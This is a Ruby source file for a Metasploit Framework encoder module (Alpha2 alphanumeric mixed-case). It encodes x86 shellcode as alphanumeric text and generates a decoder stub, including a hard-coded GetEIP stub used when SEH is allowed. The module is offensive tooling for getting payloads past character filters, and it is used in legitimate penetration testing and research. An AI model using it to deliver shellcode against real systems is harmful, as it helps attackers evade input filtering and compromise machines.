##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/encoder/alpha2/alpha_mixed'

class Metasploit3 < Msf::Encoder::Alphanum
  Rank = LowRanking

  def initialize
    super(
      'Name'             => "Alpha2 Alphanumeric Mixedcase Encoder",
      'Description'      => %q{
        Encodes payloads as alphanumeric mixedcase text.  This encoder uses
        SkyLined's Alpha2 encoding suite.
      },
      'Author'           => [ 'pusscat', 'skylined' ],
      'Arch'             => ARCH_X86,
      'License'          => BSD_LICENSE,
      'EncoderType'      => Msf::Encoder::Type::AlphanumMixed,
      'Decoder'          =>
        {
          'BlockSize' => 1,
        })
  end

  #
  # Returns the decoder stub that is adjusted for the size of the buffer
  # being encoded.
  #
  def decoder_stub(state)
    reg = datastore['BufferRegister']
    off = (datastore['BufferOffset'] || 0).to_i
    buf = ''

    # We need to create a GetEIP stub for the exploit
    if (not reg)
      if(datastore['AllowWin32SEH'] and datastore['AllowWin32SEH'].to_s =~ /^(t|y|1)/i)
        buf = 'VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089'
        reg = 'ECX'
        off = 0
      else
        res = Rex::Arch::X86.geteip_fpu(state.badchars)
        if (not res)
          raise EncodingError, "Unable to generate geteip code"
        end
      buf, reg, off = res
      end
    else
      reg.upcase!
    end

    buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off)
  end

  #
  # Encodes a one byte block with the current index of the length of the
  # payload.
  #
  def encode_block(state, block)
    Rex::Encoder::Alpha2::AlphaMixed::encode_byte(block.unpack('C')[0], state.badchars)
  end

  #
  # Tack on our terminator
  #
  def encode_end(state)
    state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator()
  end
end